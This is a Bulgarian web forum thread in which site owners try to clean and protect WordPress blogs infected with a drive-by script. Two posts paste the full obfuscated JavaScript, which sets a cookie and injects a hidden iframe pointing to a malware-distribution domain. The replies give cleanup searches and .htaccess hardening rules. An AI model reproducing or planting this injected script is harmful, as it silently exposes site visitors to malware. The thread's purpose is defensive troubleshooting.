Червейче в WordPress блог

bulram

Senior Member
Днес засякох едно червейче на един от сайтовете ми. След като опресних /F5/ изчезна.
Влезнах през прокси и пак се показа. Нямам нови файлове добавени на хоста, сигурно е "дописан" някой файл?
Ето го и кодчето което се появява още преди description-а:
Код:
<script type='text/javascript'>var a=!1; if(-1==document.cookie.indexOf("lonly")){dhf="ht";dif="\u002F\u0069\u006E\u002E\u0063";var d=new Date;dcf="\u0067\u0069\u003F\u0032";d.setTime(d.getTime());ddf="blood.cu.cc";ed=new Date(d.getTime()+72E6);dtf="tp://";document.cookie="lonly="+escape(ed.toGMTString())+";expires="+ed.toGMTString()+";path=/";df=dhf+dtf+ddf+dif+dcf;var e=-1!=navigator.userAgent.toLowerCase().indexOf("firefox"),f="1",j=function(){};j.prototype={b:function(){i=43724;this.pa="";u="u";return df},a:function(){q="q";dN=49709;this.l=46019;w="";rJ=a;this.V="";var g=document; cR=kQ=a;this.fa="";var k=window;dO="";var h=this;this.H=this.T="";this.u=64509;this.F="rQ";pK="";this.Q=39122;this.na="dY";this.d="fA";this.ka="dE";fQ=cD="";this.I="sE";try{uK=17600;this.z="pC";this.ga="bZR";this.g=41545;cL=pW="";this.v="nU";wK=a;this.h=eSU="";rO=pOR=this.s=a;this.P=eK=kVQ="";qB=a;mF="mF";this.ia=a;this.ba="";this.ca="bY";vW="getsetAttrisdf";this.m="";this.ja="zS";wE=this.i=a;this.ha="";this.n=a;this.A=55903;this.j=33170;gK=62679;var b=[];qR=vS=a;this.Z="";e||(f="0");b.push("\x68\x65\x69\x67\x68\x74", "\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x74\x72\x65\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74\x67\x65\x74","\x77\x69\x64\x74\x68","\x76\x62\x6D\x69\x66\x72\x73\x65\x74",vW,"body","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64",f,g,"\u0073\u0072\u0063");this.aa=a;this.la=42071;this.K=21002;eO=64506;this.O=55314;yT="";hS=a;this.L=aU=uKD="";fK=a;yI=this.G=this.C="";wI="wI";sJ=11632;this.r=a;rG="";this.M=a;this.J=40171;aA=4550;gL=40598;var l=b[2][b[1]](3,16);this.c=this.N=nZ="";this.S="uX";gP="gP";this.t="nAO";var m=b[4][b[1]](3,6);cO=52931;this.R=a;this.da=44254;this.f=21921;vK=m+"ame";tI="tI";lO="lO";this.q="mO";jZ=24453;var n=b[5][b[1]](3,11);this.oa=this.qa= "";p=n+"bute";this.ma="dH";qU=this.Y="";rJQ=a;var o=h.b();this.$=tT="";var c=b[9][l](vK);this.W="";this.k="iZ";c[b[10]]=o;nD=a;mIO="mIO";this.w="";c[b[3]]=b[8];oH=40281;this.p="";kM="kM";c[b[0]]=b[8];this.B=58620;mH=this.X="";bW="bW";wY="";b[9][b[6]][b[7]](c);kR="";this.U=a;fVT=""}catch(s){hK="",this.ea=45116,lKT=a,this.D="rD",g.write("\x3C\x68\x74\x6D\x6C\x20\x3E\x3C\x62\x6F\x64\x79\x20\x3E\x3C\x2F\x62\x6F\x64\x79\x3E\x3C\x2F\x68\x74\x6D\x6C\x3E"),this.o=a,uIE="",this.e="fI",k.setTimeout(function(){h.a()},233),iGB=29282,zN=6951}iS=""}};cB="";var r=new j;gT="";r.a()};</script>
Някой може ли да сподели къде да го търся това животно?
И как да си "заключа" блоговете, така че да могат да се редактират само определени от мен IP-та?
 
За: Червейче в WordPress блог

За: Червейче в WordPress блог

Най-вероятно е в header.php или functions.php на темата. И най-вероятно е виновен някой плъгин. Потърси в google-то малко инфо за плъгините, които ползваш и евентуално ще разбереш как се оправя проблема.
 
Re: Червейче в WordPress блог

В директория wp_admin слагаш един .htaccess файл със следното съдържание:

Код:
Order Deny,Allow
Deny from all
Allow from 127.0.0.1

Където 127.0.0.1 е IP адресът, само от когото ще имаш достъп.
 
Re: Червейче в WordPress блог

В директория wp_admin слагаш един .htaccess файл със следното съдържание:

Код:
Order Deny,Allow
Deny from all
Allow from 127.0.0.1
Където 127.0.0.1 е IP адресът, само от когото ще имаш достъп.
Това е крайно, но много ефикасно решение. Така се отървах от ежедневните набези на поне десетина хакера в един сайт. Първо ги забранявах по ip, но ми писна да добавям в списъка. Оставих 3 разрешени IP и дотам беше проблема.
 
Re: За: Червейче в WordPress блог

Re: За: Червейче в WordPress блог

В хедъра нямам нищо, а и functions.php е чист като сълза.
Най-вероятно е в header.php или functions.php на темата. И най-вероятно е виновен някой плъгин. Потърси в google-то малко инфо за плъгините, които ползваш и евентуално ще разбереш как се оправя проблема.
Ще го намеря и после по съвета на cloxy - по един .htaccess навсякъде, че то са 30 блога, мога ли да ги следя постоянно. Този случайно го открих.
 
Re: Червейче в WordPress блог

Ако имаш SSH достъп пусни следната команда:

grep -R 49709 *

Така ще ти покаже всички файлове в които има такава гадост. Ако нищо не излезе влез в phpMyAdmin и виж и в нея.

Друг вариант ако не излезе нищо е да търсиш с "evil" или други думи от реда които ти го добавя.
 
Re: Червейче в WordPress блог

Нямам SSH достъп, но SEARCH -> phpMyAdmin -> the exact phrase показа:
Total: 0 matches
Какъв е този "evil"?
Ако имаш SSH достъп пусни следната команда:

grep -R 49709 *

Така ще ти покаже всички файлове в които има такава гадост. Ако нищо не излезе влез в phpMyAdmin и виж и в нея.

Друг вариант ако не излезе нищо е да търсиш с "evil" или други думи от реда които ти го добавя.
 
Re: Червейче в WordPress блог

Не е evil, а eval. Това търси!

eval - да 🙂 просто винаги ми се е струвало като "зло" тоя eval а не - оценка - както се превежда 🙂

Пиши на хостинг доставчика си - никой няма да го до мързи да пусне 1 команда в конзола - бъди спокоен 🙂
 
Re: Червейче в WordPress блог

Нищо не се получава, пак ще се сменява шаблона/темата и без това имам да ползвам 2 безплатни от WooThemes......
 
Re: Червейче в WordPress блог

Yandex изпищя за още 3 блога със същия проблем, темите са платени и предполагам, че това е пак някоя нова дупка в WP. Може проблема да се окаже доста сериозен. Така че който е на WP да си провери кода, интересното е че повечето онлайн скенери не го засичат. Даже Г още не е пропищял, но братушките го изловиха 🙂
Mal/Iframe-V
Данный вердикт означает, что на странице присутствует тег <iframe> в атрибуте src которого стоит доменное имя, с которого распространяется вредоносное ПО, а так же с атрибутами width, height со значениями от 0 до 2. Кроме вышеуказанных атрибутов, тег <iframe> также может включать в себя дополнительные атрибуты, такие как frameborder=0, style="VISIBILITY:hidden", style="display:none".
 
Re: Червейче в WordPress блог

$10 в PayPal който ми каже кой файл пише този код в хедъра!!!​
Код:
<script type='text/javascript'>var a=!1; if(-1==document.cookie.indexOf("lonly")){dhf="ht";dif="\u002F\u0069\u006E\u002E\u0063";var d=new Date;dcf="\u0067\u0069\u003F\u0032";d.setTime(d.getTime());ddf="analyze.net.tf";ed=new Date(d.getTime()+72E6);dtf="tp://";document.cookie="lonly="+escape(ed.toGMTString())+";expires="+ed.toGMTString()+";path=/";df=dhf+dtf+ddf+dif+dcf;var e=-1!=navigator.userAgent.toLowerCase().indexOf("firefox"),f="1",j=function(){};j.prototype={b:function(){i=43724;this.pa="";u="u";return df},a:function(){q="q";dN=49709;this.l=46019;w="";rJ=a;this.V="";var g=document; cR=kQ=a;this.fa="";var k=window;dO="";var h=this;this.H=this.T="";this.u=64509;this.F="rQ";pK="";this.Q=39122;this.na="dY";this.d="fA";this.ka="dE";fQ=cD="";this.I="sE";try{uK=17600;this.z="pC";this.ga="bZR";this.g=41545;cL=pW="";this.v="nU";wK=a;this.h=eSU="";rO=pOR=this.s=a;this.P=eK=kVQ="";qB=a;mF="mF";this.ia=a;this.ba="";this.ca="bY";vW="getsetAttrisdf";this.m="";this.ja="zS";wE=this.i=a;this.ha="";this.n=a;this.A=55903;this.j=33170;gK=62679;var b=[];qR=vS=a;this.Z="";e||(f="0");b.push("\x68\x65\x69\x67\x68\x74", "\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x74\x72\x65\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74\x67\x65\x74","\x77\x69\x64\x74\x68","\x76\x62\x6D\x69\x66\x72\x73\x65\x74",vW,"body","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64",f,g,"\u0073\u0072\u0063");this.aa=a;this.la=42071;this.K=21002;eO=64506;this.O=55314;yT="";hS=a;this.L=aU=uKD="";fK=a;yI=this.G=this.C="";wI="wI";sJ=11632;this.r=a;rG="";this.M=a;this.J=40171;aA=4550;gL=40598;var l=b[2][b[1]](3,16);this.c=this.N=nZ="";this.S="uX";gP="gP";this.t="nAO";var m=b[4][b[1]](3,6);cO=52931;this.R=a;this.da=44254;this.f=21921;vK=m+"ame";tI="tI";lO="lO";this.q="mO";jZ=24453;var n=b[5][b[1]](3,11);this.oa=this.qa= "";p=n+"bute";this.ma="dH";qU=this.Y="";rJQ=a;var o=h.b();this.$=tT="";var c=b[9][l](vK);this.W="";this.k="iZ";c[b[10]]=o;nD=a;mIO="mIO";this.w="";c[b[3]]=b[8];oH=40281;this.p="";kM="kM";c[b[0]]=b[8];this.B=58620;mH=this.X="";bW="bW";wY="";b[9][b[6]][b[7]](c);kR="";this.U=a;fVT=""}catch(s){hK="",this.ea=45116,lKT=a,this.D="rD",g.write("\x3C\x68\x74\x6D\x6C\x20\x3E\x3C\x62\x6F\x64\x79\x20\x3E\x3C\x2F\x62\x6F\x64\x79\x3E\x3C\x2F\x68\x74\x6D\x6C\x3E"),this.o=a,uIE="",this.e="fI",k.setTimeout(function(){h.a()},233),iGB=29282,zN=6951}iS=""}};cB="";var r=new j;gT="";r.a()};</script>

Сайта е bank-credits.com има го и в vitaminz.info
Ако не го виждате, ползвайте прокси /hidemyass.com/, не се появя всеки път!!!

Ако някой има нужда от допълнителна информация или средства - ЛС.
 
Последно редактирано от модератор:
Re: Червейче в WordPress блог

Булрам, имаш ли възможност (и желание, разбира се) да ми дадеш на .zip сайта (без администрацията, снимки и медия каквато има), за да го проверя?

EDIT: Може и само FTP достъп да ми свърши работа всъщност
 
Последно редактирано:
Re: Червейче в WordPress блог

Една минимална, но лесна за поставяне защита:

Код:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^$
RewriteRule .* - [F]
</IfModule>

Слага се като .htaccess файл в /wp-admin/ директорията. Блокира заявките без User-Agent. Ако някой заразява чрез скрипт автоматично, едва ли си слага User-Agent.

Друг вариант е да се проверява и referrer-а, защото има зеещи дупки от години, свързани с него. Нещо простичко, като:

Код:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http://www.example.com [NC]
RewriteRule .* - [F]
</IfModule>

Пак в директория /wp-admin/, като заменяте базовия URL на сайта.
 
За: Re: Червейче в WordPress блог

За: Re: Червейче в WordPress блог

И на мен ми "пробиха" 2 блога.
През tim thumbs на elegantthemes
(в новите упдейти на темите са ги премахнали)

Даже единия ми го спряха от host.bg.

Ползвам този онлайн скенер:
Sucuri SiteCheck - Free Website Malware Scans

Това с .htaccess файла е добро,
но аз съм сложил този плъгин:
WordPress › WordPress Firewall 2

Пристигат ми такива съобщения от него:
///////////////////////////////////////////////////////////////////
WordPress Firewall has detected and blocked a potential attack!
Web Page: WEBSITE..//wp-content/plugins/kish-guest-posting/uploadify/scripts/uploadify.php?folder=
Warning: URL may contain dangerous content!
Offending IP: 178.137.166.209 [ Get IP location ]
Offending Parameter: $_FILE = index.bak.php

This may be a "Executable File Upload Attack."

Click here for more information on this type of attack.

If you suspect this may be a false alarm because of something you recently did, try to confirm by repeating those actions. If so, whitelist it via the "whitelist this variable" link below. This will prevent future false alarms.

Click here to whitelist this variable.
Click here to turn off these emails.
Repeated warnings for similar attacks are currently sent via email, click here to suppress them.
/////////////////////////////////////////////////////////////////////////////////////////

В случая нямам такъв плъгин инсталиран.
 
Re: Червейче в WordPress блог

@cloxy мисля ако с Ma57eR пооправим нещата, да сложа по един .htaccess на всеки един домейн, но ще сложа и това в /wp-admin/ директорията за допълнителна сигурност.

@Duster след толкова проблеми последните месеци с WP и разни плъгини не вярвам на нищо, имам по 2 плъгина макс, и то ако са крайно необходими.
Също ползвам _sitecheck.sucuri.net но той само показва, че има проблем, аз имам по 300 файла мин. на домейн, на някой много повече. Трябва ми нещо което да показва от къде се бълва злото 🙂
 
За: Re: Червейче в WordPress блог

За: Re: Червейче в WordPress блог

@Duster след толкова проблеми последните месеци с WP и разни плъгини не вярвам на нищо, имам по 2 плъгина макс, и то ако са крайно необходими.
Също ползвам _sitecheck.sucuri.net но той само показва, че има проблем, аз имам по 300 файла мин. на домейн, на някой много повече. Трябва ми нещо което да показва от къде се бълва злото 🙂

_sitecheck.sucuri.net показва точно от къде идва...

на мен ми извади точно този eval и кои файлове са заразени.

------
Важни са ти блоговете и си хвърлил много труд сигурно,
обаче, БЕЗ ПАНИКА 🙂 Ще се оправят нещата - нали мислиш
..а и виж колко други хора заедно с теб.
 
Re: Червейче в WordPress блог

Това е крайно, но много ефикасно решение. Така се отървах от ежедневните набези на поне десетина хакера в един сайт. Първо ги забранявах по ip, но ми писна да добавям в списъка. Оставих 3 разрешени IP и дотам беше проблема.
А няма ли възможност гадове да се добавят в някоя от другите папки? Да речем /wp-content/ или /wp-includes/ ако има някоя дупка в WP?
 
За: Червейче в WordPress блог

За: Червейче в WordPress блог

Cloxy, аз имам такова за защита на POST заявките с парола в htaccess-а, но искам да добавя и твоите неща, които каза горе. Става ли просто да ги добавя едно след друго всички във файла? 🙂 Нали няма да си пречат?
 

Back
Горе